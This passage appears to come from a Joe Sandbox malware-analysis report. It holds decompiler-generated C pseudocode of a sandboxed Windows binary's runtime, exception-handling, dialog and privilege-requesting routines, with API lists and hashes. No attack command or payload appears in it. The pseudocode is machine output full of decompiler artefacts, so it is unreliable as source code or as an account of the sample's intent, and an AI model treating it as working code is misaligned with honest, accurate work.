                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC742
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC754
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC766
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC778
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC78A
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC79C
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7AE
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7C0
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7D2
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7E4
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7F6
                • _free.LIBCMT ref: 003FCB5B
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003FCB7D
                • _free.LIBCMT ref: 003FCB92
                • _free.LIBCMT ref: 003FCB9D
                • _free.LIBCMT ref: 003FCBBF
                • _free.LIBCMT ref: 003FCBD2
                • _free.LIBCMT ref: 003FCBE0
                • _free.LIBCMT ref: 003FCBEB
                • _free.LIBCMT ref: 003FCC23
                • _free.LIBCMT ref: 003FCC2A
                • _free.LIBCMT ref: 003FCC47
                • _free.LIBCMT ref: 003FCC5F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID: h@
                • API String ID: 161543041-147436215
                • Opcode ID: 3f0f4db10853ebd6918caa7af935ce73cc3264bcafb26eafdbdd23edcb1dd988
                • Instruction ID: 6f25c5674921ae98024f9a459aa17f847165f1ae792ee6735f404372d3f1037b
                • Opcode Fuzzy Hash: 3f0f4db10853ebd6918caa7af935ce73cc3264bcafb26eafdbdd23edcb1dd988
                • Instruction Fuzzy Hash: 65319C3165034D9FEB26AB38DA42B7AB7E8AF01350F116829F648DB192DF30EC40CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003F96F1(char _a4) {
                				char _v8;
                
                				_t26 = _a4;
                				_t52 =  *_a4;
                				if( *_a4 != 0x406430) {
                					E003F8DCC(_t52);
                					_t26 = _a4;
                				}
                				E003F8DCC( *((intOrPtr*)(_t26 + 0x3c)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x30)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x34)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x38)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x28)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x2c)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x40)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x44)));
                				E003F8DCC( *((intOrPtr*)(_a4 + 0x360)));
                				_v8 =  &_a4;
                				E003F95A9(5,  &_v8);
                				_v8 =  &_a4;
                				return E003F95F9(4,  &_v8);
                			}





                APIs
                • _free.LIBCMT ref: 003F9705
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003F9711
                • _free.LIBCMT ref: 003F971C
                • _free.LIBCMT ref: 003F9727
                • _free.LIBCMT ref: 003F9732
                • _free.LIBCMT ref: 003F973D
                • _free.LIBCMT ref: 003F9748
                • _free.LIBCMT ref: 003F9753
                • _free.LIBCMT ref: 003F975E
                • _free.LIBCMT ref: 003F976C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID: 0d@
                • API String ID: 776569668-2892485553
                • Opcode ID: 9c3bc723d7f50ebc544d096e3960aa72a87b18d922ccc26672695280eb65c432
                • Instruction ID: e1f801fd4ccd3b65783ee39e498600a6a2671aad5649b536c4d6ee8d200ad269
                • Opcode Fuzzy Hash: 9c3bc723d7f50ebc544d096e3960aa72a87b18d922ccc26672695280eb65c432
                • Instruction Fuzzy Hash: 4111A47611014DAFCB06EF54C842DE93BB5EF15390B5154A1FB088F272DE32DA509B84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003ED69E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
                				void _v0;
                				intOrPtr _v4;
                				intOrPtr _v12;
                				struct HWND__* _t9;
                				void* _t19;
                				void* _t26;
                				void* _t28;
                				void* _t30;
                				struct HWND__* _t33;
                				struct HWND__* _t36;
                				void* _t40;
                				void* _t49;
                
                				_t49 = __fp0;
                				_t40 = __eflags;
                				_t28 = __edx;
                				E003EEC50(0x1018);
                				_t9 = E003EA5C6(_t40);
                				if(_t9 == 0) {
                					L12:
                					return _t9;
                				}
                				_t9 = GetWindow(_a4124, 5);
                				_t33 = _t9;
                				_t30 = 0;
                				_t36 = _t33;
                				if(_t33 == 0) {
                					L11:
                					goto L12;
                				}
                				while(_t30 < 0x200) {
                					GetClassNameW(_t33,  &_a24, 0x800);
                					if(E003E1FBB( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t33, 0xfffffff0) & 0x0000001f) == 0xe) {
                						_t26 = SendMessageW(_t33, 0x173, 0, 0);
                						if(_t26 != 0) {
                							GetObjectW(_t26, 0x18,  &_v0);
                							_t19 = E003EA605(_v4);
                							SendMessageW(_t33, 0x172, 0, E003EA80C(_t28, _t49, _t26, E003EA5E4(_v12), _t19));
                							DeleteObject(_t26);
                						}
                					}
                					_t9 = GetWindow(_t33, 2);
                					_t33 = _t9;
                					if(_t33 != _t36) {
                						_t30 = _t30 + 1;
                						if(_t33 != 0) {
                							continue;
                						}
                					}
                					break;
                				}
                				goto L11;
                			}
















                APIs
                • GetWindow.USER32(?,00000005), ref: 003ED6C1
                • GetClassNameW.USER32(00000000,?,00000800), ref: 003ED6ED
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                • GetWindowLongW.USER32(00000000,000000F0), ref: 003ED709
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 003ED720
                • GetObjectW.GDI32(00000000,00000018,?), ref: 003ED734
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 003ED75D
                • DeleteObject.GDI32(00000000), ref: 003ED764
                • GetWindow.USER32(00000000,00000002), ref: 003ED76D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                • Opcode ID: 3834213f58d30ad1b084f6e0608a0b2c659f09cfac750a8af662b71d972c65e7
                • Instruction ID: d67043455a5ba3c2e5bf6b80042a2e5eb057b5742a1520495751ddeac2125281
                • Opcode Fuzzy Hash: 3834213f58d30ad1b084f6e0608a0b2c659f09cfac750a8af662b71d972c65e7
                • Instruction Fuzzy Hash: 621136721007B07BE7226F729C4AFAF766CAF41712F014331FA91A60D5DB748B0546A9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E003F2E31(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                				signed char* _v0;
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				intOrPtr _v24;
                				char _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				intOrPtr _v48;
                				signed int _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				void _v64;
                				signed int _v68;
                				char _v84;
                				intOrPtr _v88;
                				signed int _v92;
                				intOrPtr _v100;
                				void _v104;
                				intOrPtr* _v112;
                				signed char* _v184;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t201;
                				signed int _t202;
                				char _t203;
                				signed int _t205;
                				signed int _t207;
                				signed char* _t208;
                				signed int _t209;
                				signed int _t210;
                				signed int _t214;
                				void* _t217;
                				signed char* _t220;
                				void* _t222;
                				void* _t224;
                				signed char _t228;
                				signed int _t229;
                				void* _t231;
                				void* _t234;
                				void* _t237;
                				signed int _t247;
                				void* _t250;
                				intOrPtr* _t251;
                				signed int _t252;
                				intOrPtr _t253;
                				signed int _t254;
                				void* _t259;
                				void* _t261;
                				void* _t264;
                				void* _t265;
                				signed int _t269;
                				signed char* _t270;
                				intOrPtr* _t271;
                				signed char _t272;
                				signed int _t273;
                				signed int _t274;
                				intOrPtr* _t276;
                				signed int _t277;
                				signed int _t278;
                				signed int _t283;
                				signed int _t290;
                				signed int _t291;
                				signed int _t294;
                				signed int _t296;
                				signed char* _t297;
                				signed int _t298;
                				signed char _t299;
                				signed int* _t301;
                				signed char* _t304;
                				signed int _t314;
                				signed int _t315;
                				signed int _t317;
                				signed int _t327;
                				void* _t329;
                				void* _t331;
                				void* _t332;
                				void* _t333;
                				void* _t334;
                
                				_t296 = __edx;
                				_push(_t315);
                				_t301 = _a20;
                				_v20 = 0;
                				_v28 = 0;
                				_t275 = E003F3DAA(_a8, _a16, _t301);
                				_t332 = _t331 + 0xc;
                				_v12 = _t275;
                				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                					L67:
                					_t201 = E003F8D24(_t270, _t296, _t301, _t315);
                					asm("int3");
                					_t329 = _t332;
                					_t333 = _t332 - 0x38;
                					_push(_t270);
                					_t271 = _v112;
                					__eflags =  *_t271 - 0x80000003;
                					if(__eflags == 0) {
                						return _t201;
                					} else {
                						_push(_t315);
                						_push(_t301);
                						_t202 = E003F2AEC(_t271, _t275, _t296, _t301, _t315, __eflags);
                						__eflags =  *(_t202 + 8);
                						if(__eflags != 0) {
                							__imp__EncodePointer(0);
                							_t315 = _t202;
                							_t222 = E003F2AEC(_t271, _t275, _t296, 0, _t315, __eflags);
                							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                								__eflags =  *_t271 - 0xe0434f4d;
                								if( *_t271 != 0xe0434f4d) {
                									__eflags =  *_t271 - 0xe0434352;
                									if( *_t271 != 0xe0434352) {
                										_t214 = E003F0961(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                										_t333 = _t333 + 0x1c;
                										__eflags = _t214;
                										if(_t214 != 0) {
                											L84:
                											return _t214;
                										}
                									}
                								}
                							}
                						}
                						_t203 = _a16;
                						_v28 = _t203;
                						_v24 = 0;
                						__eflags =  *(_t203 + 0xc);
                						if( *(_t203 + 0xc) > 0) {
                							_push(_a24);
                							E003F0894(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                							_t298 = _v40;
                							_t334 = _t333 + 0x18;
                							_t214 = _v44;
                							_v20 = _t214;
                							_v12 = _t298;
                							__eflags = _t298 - _v32;
                							if(_t298 >= _v32) {
                								goto L84;
                							}
                							_t277 = _t298 * 0x14;
                							__eflags = _t277;
                							_v16 = _t277;
                							do {
                								_t278 = 5;
                								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                								_t334 = _t334 + 0xc;
                								__eflags = _v64 - _t217;
                								if(_v64 > _t217) {
                									goto L83;
                								}
                								__eflags = _t217 - _v60;
                								if(_t217 > _v60) {
                									goto L83;
                								}
                								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                								_t283 = _t220[4];
                								__eflags = _t283;
                								if(_t283 == 0) {
                									L81:
                									__eflags =  *_t220 & 0x00000040;
                									if(( *_t220 & 0x00000040) == 0) {
                										_push(0);
                										_push(1);
                										E003F2DB1(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                										_t298 = _v12;
                										_t334 = _t334 + 0x30;
                									}
                									goto L83;
                								}
                								__eflags =  *((char*)(_t283 + 8));
                								if( *((char*)(_t283 + 8)) != 0) {
                									goto L83;
                								}
                								goto L81;
                								L83:
                								_t298 = _t298 + 1;
                								_t214 = _v20;
                								_t277 = _v16 + 0x14;
                								_v12 = _t298;
                								_v16 = _t277;
                								__eflags = _t298 - _v32;
                							} while (_t298 < _v32);
                							goto L84;
                						}
                						E003F8D24(_t271, _t296, 0, _t315);
                						asm("int3");
                						_push(_t329);
                						_t297 = _v184;
                						_push(_t271);
                						_push(_t315);
                						_push(0);
                						_t205 = _t297[4];
                						__eflags = _t205;
                						if(_t205 == 0) {
                							L109:
                							_t207 = 1;
                							__eflags = 1;
                						} else {
                							_t276 = _t205 + 8;
                							__eflags =  *_t276;
                							if( *_t276 == 0) {
                								goto L109;
                							} else {
                								__eflags =  *_t297 & 0x00000080;
                								_t304 = _v0;
                								if(( *_t297 & 0x00000080) == 0) {
                									L91:
                									_t272 = _t304[4];
                									_t317 = 0;
                									__eflags = _t205 - _t272;
                									if(_t205 == _t272) {
                										L101:
                										__eflags =  *_t304 & 0x00000002;
                										if(( *_t304 & 0x00000002) == 0) {
                											L103:
                											_t208 = _a4;
                											__eflags =  *_t208 & 0x00000001;
                											if(( *_t208 & 0x00000001) == 0) {
                												L105:
                												__eflags =  *_t208 & 0x00000002;
                												if(( *_t208 & 0x00000002) == 0) {
                													L107:
                													_t317 = 1;
                													__eflags = 1;
                												} else {
                													__eflags =  *_t297 & 0x00000002;
                													if(( *_t297 & 0x00000002) != 0) {
                														goto L107;
                													}
                												}
                											} else {
                												__eflags =  *_t297 & 0x00000001;
                												if(( *_t297 & 0x00000001) != 0) {
                													goto L105;
                												}
                											}
                										} else {
                											__eflags =  *_t297 & 0x00000008;
                											if(( *_t297 & 0x00000008) != 0) {
                												goto L103;
                											}
                										}
                										_t207 = _t317;
                									} else {
                										_t184 = _t272 + 8; // 0x6e
                										_t209 = _t184;
                										while(1) {
                											_t273 =  *_t276;
                											__eflags = _t273 -  *_t209;
                											if(_t273 !=  *_t209) {
                												break;
                											}
                											__eflags = _t273;
                											if(_t273 == 0) {
                												L97:
                												_t210 = _t317;
                											} else {
                												_t274 =  *((intOrPtr*)(_t276 + 1));
                												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                													break;
                												} else {
                													_t276 = _t276 + 2;
                													_t209 = _t209 + 2;
                													__eflags = _t274;
                													if(_t274 != 0) {
                														continue;
                													} else {
                														goto L97;
                													}
                												}
                											}
                											L99:
                											__eflags = _t210;
                											if(_t210 == 0) {
                												goto L101;
                											} else {
                												_t207 = 0;
                											}
                											goto L110;
                										}
                										asm("sbb eax, eax");
                										_t210 = _t209 | 0x00000001;
                										__eflags = _t210;
                										goto L99;
                									}
                								} else {
                									__eflags =  *_t304 & 0x00000010;
                									if(( *_t304 & 0x00000010) != 0) {
                										goto L109;
                									} else {
                										goto L91;
                									}
                								}
                							}
                						}
                						L110:
                						return _t207;
                					}
                				} else {
                					_t270 = _a4;
                					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                						L22:
                						_t296 = _a12;
                						_v8 = _t296;
                						goto L24;
                					} else {
                						_t315 = 0;
                						_t342 = _t270[0x1c];
                						if(_t270[0x1c] != 0) {
                							goto L22;
                						} else {
                							_t224 = E003F2AEC(_t270, _t275, _t296, _t301, 0, _t342);
                							_t343 =  *((intOrPtr*)(_t224 + 0x10));
                							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                								L61:
                								return _t224;
                							} else {
                								_t270 =  *(E003F2AEC(_t270, _t275, _t296, _t301, 0, _t343) + 0x10);
                								_t259 = E003F2AEC(_t270, _t275, _t296, _t301, 0, _t343);
                								_v28 = 1;
                								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                								if(_t270 == 0) {
                									goto L67;
                								} else {
                									if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                										L16:
                										_t261 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, _t350);
                										_t351 =  *((intOrPtr*)(_t261 + 0x1c)) - _t315;
                										if( *((intOrPtr*)(_t261 + 0x1c)) == _t315) {
                											L23:
                											_t296 = _v8;
                											_t275 = _v12;
                											L24:
                											_v52 = _t301;
                											_v48 = 0;
                											__eflags =  *_t270 - 0xe06d7363;
                											if( *_t270 != 0xe06d7363) {
                												L57:
                												__eflags = _t301[3];
                												if(__eflags <= 0) {
                													goto L60;
                												} else {
                													__eflags = _a24;
                													if(__eflags != 0) {
                														goto L67;
                													} else {
                														_push(_a32);
                														_push(_a28);
                														_push(_t275);
                														_push(_t301);
                														_push(_a16);
                														_push(_t296);
                														_push(_a8);
                														_push(_t270);
                														L68();
                														_t332 = _t332 + 0x20;
                														goto L60;
                													}
                												}
                											} else {
                												__eflags = _t270[0x10] - 3;
                												if(_t270[0x10] != 3) {
                													goto L57;
                												} else {
                													__eflags = _t270[0x14] - 0x19930520;
                													if(_t270[0x14] == 0x19930520) {
                														L29:
                														_t315 = _a32;
                														__eflags = _t301[3];
                														if(_t301[3] > 0) {
                															_push(_a28);
                															E003F0894(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                															_t296 = _v64;
                															_t332 = _t332 + 0x18;
                															_t247 = _v68;
                															_v44 = _t247;
                															_v16 = _t296;
                															__eflags = _t296 - _v56;
                															if(_t296 < _v56) {
                																_t290 = _t296 * 0x14;
                																__eflags = _t290;
                																_v32 = _t290;
                																do {
                																	_t291 = 5;
                																	_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                																	_t332 = _t332 + 0xc;
                																	__eflags = _v104 - _t250;
                																	if(_v104 <= _t250) {
                																		__eflags = _t250 - _v100;
                																		if(_t250 <= _v100) {
                																			_t294 = 0;
                																			_v20 = 0;
                																			__eflags = _v92;
                																			if(_v92 != 0) {
                																				_t299 = _t270[0x1c];
                																				_t251 =  *((intOrPtr*)(_t299 + 0xc));
                																				_t252 = _t251 + 4;
                																				__eflags = _t252;
                																				_v36 = _t252;
                																				_t253 = _v88;
                																				_v40 =  *_t251;
                																				_v24 = _t253;
                																				do {
                																					asm("movsd");
                																					asm("movsd");
                																					asm("movsd");
                																					asm("movsd");
                																					_t327 = _v40;
                																					_t314 = _v36;
                																					__eflags = _t327;
                																					if(_t327 <= 0) {
                																						goto L40;
                																					} else {
                																						while(1) {
                																							_push(_t299);
                																							_push( *_t314);
                																							_t254 =  &_v84;
                																							_push(_t254);
                																							L87();
                																							_t332 = _t332 + 0xc;
                																							__eflags = _t254;
                																							if(_t254 != 0) {
                																								break;
                																							}
                																							_t299 = _t270[0x1c];
                																							_t327 = _t327 - 1;
                																							_t314 = _t314 + 4;
                																							__eflags = _t327;
                																							if(_t327 > 0) {
                																								continue;
                																							} else {
                																								_t294 = _v20;
                																								_t253 = _v24;
                																								goto L40;
                																							}
                																							goto L43;
                																						}
                																						_push(_a24);
                																						_push(_v28);
                																						E003F2DB1(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                																						_t332 = _t332 + 0x30;
                																					}
                																					L43:
                																					_t296 = _v16;
                																					goto L44;
                																					L40:
                																					_t294 = _t294 + 1;
                																					_t253 = _t253 + 0x10;
                																					_v20 = _t294;
                																					_v24 = _t253;
                																					__eflags = _t294 - _v92;
                																				} while (_t294 != _v92);
                																				goto L43;
                																			}
                																		}
                																	}
                																	L44:
                																	_t296 = _t296 + 1;
                																	_t247 = _v44;
                																	_t290 = _v32 + 0x14;
                																	_v16 = _t296;
                																	_v32 = _t290;
                																	__eflags = _t296 - _v56;
                																} while (_t296 < _v56);
                																_t301 = _a20;
                																_t315 = _a32;
                															}
                														}
                														__eflags = _a24;
                														if(__eflags != 0) {
                															_push(1);
                															E003F0150(_t270, _t301, _t315, __eflags);
                															_t275 = _t270;
                														}
                														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                														if(__eflags < 0) {
                															L60:
                															_t224 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
                															__eflags =  *(_t224 + 0x1c);
                															if( *(_t224 + 0x1c) != 0) {
                																goto L67;
                															} else {
                																goto L61;
                															}
                														} else {
                															_t228 = _t301[8] >> 2;
                															__eflags = _t301[7];
                															if(_t301[7] != 0) {
                																__eflags = _t228 & 0x00000001;
                																if(__eflags == 0) {
                																	_push(_t301[7]);
                																	_t229 = E003F384A(_t270, _t301, _t315, _t270);
                																	_pop(_t275);
                																	__eflags = _t229;
                																	if(__eflags == 0) {
                																		goto L64;
                																	} else {
                																		goto L60;
                																	}
                																} else {
                																	goto L54;
                																}
                															} else {
                																__eflags = _t228 & 0x00000001;
                																if(__eflags == 0) {
                																	goto L60;
                																} else {
                																	__eflags = _a28;
                																	if(__eflags != 0) {
                																		goto L60;
                																	} else {
                																		L54:
                																		 *(E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
                																		_t237 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
                																		_t286 = _v8;
                																		 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                																		goto L62;
                																	}
                																}
                															}
                														}
                													} else {
                														__eflags = _t270[0x14] - 0x19930521;
                														if(_t270[0x14] == 0x19930521) {
                															goto L29;
                														} else {
                															__eflags = _t270[0x14] - 0x19930522;
                															if(_t270[0x14] != 0x19930522) {
                																goto L57;
                															} else {
                																goto L29;
                															}
                														}
                													}
                												}
                											}
                										} else {
                											_v16 =  *((intOrPtr*)(E003F2AEC(_t270, _t275, _t296, _t301, _t315, _t351) + 0x1c));
                											_t264 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, _t351);
                											_push(_v16);
                											 *(_t264 + 0x1c) = _t315;
                											_t265 = E003F384A(_t270, _t301, _t315, _t270);
                											_pop(_t286);
                											if(_t265 != 0) {
                												goto L23;
                											} else {
                												_t301 = _v16;
                												_t353 =  *_t301 - _t315;
                												if( *_t301 <= _t315) {
                													L62:
                													E003F7AF4(_t270, _t286, _t296, _t301, _t315, __eflags);
                												} else {
                													while(1) {
                														_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                														if(E003F34D3( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x40efb4) != 0) {
                															goto L63;
                														}
                														_t315 = _t315 + 0x10;
                														_t269 = _v20 + 1;
                														_v20 = _t269;
                														_t353 = _t269 -  *_t301;
                														if(_t269 >=  *_t301) {
                															goto L62;
                														} else {
                															continue;
                														}
                														goto L63;
                													}
                												}
                												L63:
                												_push(1);
                												_push(_t270);
                												E003F0150(_t270, _t301, _t315, __eflags);
                												_t275 =  &_v64;
                												E003F34BB( &_v64);
                												E003F238D( &_v64, 0x40c284);
                												L64:
                												 *(E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
                												_t231 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
                												_t275 = _v8;
                												 *(_t231 + 0x14) = _v8;
                												__eflags = _t315;
                												if(_t315 == 0) {
                													_t315 = _a8;
                												}
                												E003F0A87(_t275, _t315, _t270);
                												E003F374A(_a8, _a16, _t301);
                												_t234 = E003F3907(_t301);
                												_t332 = _t332 + 0x10;
                												_push(_t234);
                												E003F36C1(_t270, _t275, _t296, _t301, _t315, __eflags);
                												goto L67;
                											}
                										}
                									} else {
                										_t350 = _t270[0x1c] - _t315;
                										if(_t270[0x1c] == _t315) {
                											goto L67;
                										} else {
                											goto L16;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                 			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                 • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 322700389-393685449
                • Opcode ID: 1a84a9255d7efa1bb5dc0cbbc28156e7ee53d84785c4e19ac28a6a2617a8649d
                • Instruction ID: 35bb05738e96f0356ee0810ffe722e440bdbd2d3300a0f0eb1b29219ba63d9cd
                • Opcode Fuzzy Hash: 1a84a9255d7efa1bb5dc0cbbc28156e7ee53d84785c4e19ac28a6a2617a8649d
                • Instruction Fuzzy Hash: 2CB1477190020DEFCF2AEFA4C8819BFBBB5BF14310F15416AEA156B212DB35DA51CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003D6FA5(void* __edx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t109;
                				signed int _t112;
                				intOrPtr _t117;
                				signed int _t134;
                				long _t154;
                				void* _t182;
                				void* _t186;
                				void* _t190;
                				void* _t194;
                				short _t195;
                				void* _t199;
                				WCHAR* _t200;
                				long _t201;
                				signed int _t203;
                				signed int _t204;
                				signed int _t205;
                				signed int _t229;
                				intOrPtr* _t233;
                				intOrPtr* _t234;
                				void* _t236;
                				intOrPtr _t237;
                				signed int _t238;
                				void* _t239;
                				intOrPtr _t240;
                				signed int _t242;
                				intOrPtr _t244;
                				short _t245;
                				void* _t246;
                				intOrPtr _t250;
                				short _t252;
                				void* _t253;
                				void* _t255;
                				void* _t256;
                
                				E003EEB78(0x40279e, _t253);
                				E003EEC50(0x30a8);
                				if( *0x411023 == 0) {
                					E003D7A9C(L"SeRestorePrivilege");
                					E003D7A9C(L"SeCreateSymbolicLinkPrivilege");
                					 *0x411023 = 1;
                				}
                				_t203 = _t253 - 0x2c;
                				E003D13BA(_t203, 0x1418);
                				_t244 =  *((intOrPtr*)(_t253 + 0x10));
                				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
                				E003E0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
                				 *(_t253 - 0x14) = E003F3E13(_t253 - 0x107c);
                				_t236 = _t253 - 0x107c;
                				_t199 = _t253 - 0x207c;
                				_t109 = E003F6088(_t236, L"\\??\\", 4);
                				_t256 = _t255 + 0x10;
